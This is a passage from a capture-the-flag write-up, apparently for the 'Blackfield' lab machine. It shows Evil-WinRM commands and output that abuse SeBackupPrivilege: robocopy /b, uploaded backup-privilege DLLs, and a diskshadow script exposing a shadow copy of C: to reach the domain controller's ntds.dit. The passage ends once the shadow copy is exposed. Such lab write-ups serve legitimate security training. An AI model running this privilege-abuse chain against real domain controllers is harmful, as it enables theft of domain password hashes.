45-Enumeration
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We have SeRestorePrivilege and SeBackupPrivilege, which are dangerous.
With both of these privs, I can use robocopy to read files
*Evil-WinRM* PS C:\programdata\temp> robocopy /b C:\users\administrator\desktop C:\programdata\temp
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Friday, January 12, 2024 1:50:10 PM
Source : C:\users\administrator\desktop\
Dest : C:\programdata\temp\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
3 C:\users\administrator\desktop\
New File 32 root.txt
2024/01/12 13:50:10 ERROR 5 (0x00000005) Copying File C:\users\administrator\desktop\root.txt
Access is denied.
No luck i was not able to get root.txt.
Found this repo to exploit the above privileges https://github.com/giuliano108/SeBackupPrivilege
On Windows, if a user has the "Back up files and directories" right, he gets assigned the SE_BACKUP_NAME/SeBackupPrivilege privilege. Such privilege is disabled by default but when switched on it allows the user to access directories/files that he doesn't own or doesn't have permission to. In MSDN's own words:
This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system.
In order to exploit SeBackupPrivilege you have to:
Enable the privilege.
This alone lets you traverse (cd into) any1 directory, local or remote, and list (dir, Get-ChildItem) its contents.
If you want to read/copy data out of a "normally forbidden" folder, you have to act as a backup software. The shell copy command won't work; you'll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
This library exposes three PowerShell CmdLets that do just that.
I need to upload these two files on the target.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload /home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilege
/home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeCmdLets.dll
/home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload /home/nakul/Desktop/ctf/htb/Blackfield/SeBackupPrivilegeUtils.dll
import both the modules
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
Tried to copy ntds.dit file which stores password hashes on the DC as a database.
*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT:
0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
The files is in use so i can't copy it and then read it.
Found this article to exploit these privileges https://pentestlab.blog/tag/diskshadow/
It was a trouble for me to get this working. After spending much time i found this file.
set context persistent nowriters
set metadata c:\programdata\df.cab
set verbose on
add volume c: alias df
create
expose %df% z:
used dos2unix on the file
dos2unix hello.dsh
dos2unix: converting file hello.dsh to Unix format...
Uploaded hello.dsh to the target.
*Evil-WinRM* PS C:\programdata\temp> diskshadow /s c:\programdata\temp\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 1/12/2024 2:05:04 PM
-> set context persistent nowriters
-> set metadata c:\programdata\df.cab
-> set verbose on
-> add volume c: alias df
-> create
Alias df for shadow ID {1e79a0a6-a34a-432d-8146-55266a1b8c4e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {e63fd451-7676-45f9-bb36-639ddf27f7de} set as environment variable.
Inserted file Manifest.xml into .cab file df.cab
Inserted file DisBACE.tmp into .cab file df.cab
Querying all shadow copies with the shadow copy set ID {e63fd451-7676-45f9-bb36-639ddf27f7de}
* Shadow copy ID = {1e79a0a6-a34a-432d-8146-55266a1b8c4e} %df%
- Shadow copy set: {e63fd451-7676-45f9-bb36-639ddf27f7de} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 1/12/2024 2:05:05 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %df% z:
-> %df% = {1e79a0a6-a34a-432d-8146-55266a1b8c4e}
The shadow copy was successfully exposed as z:\.
->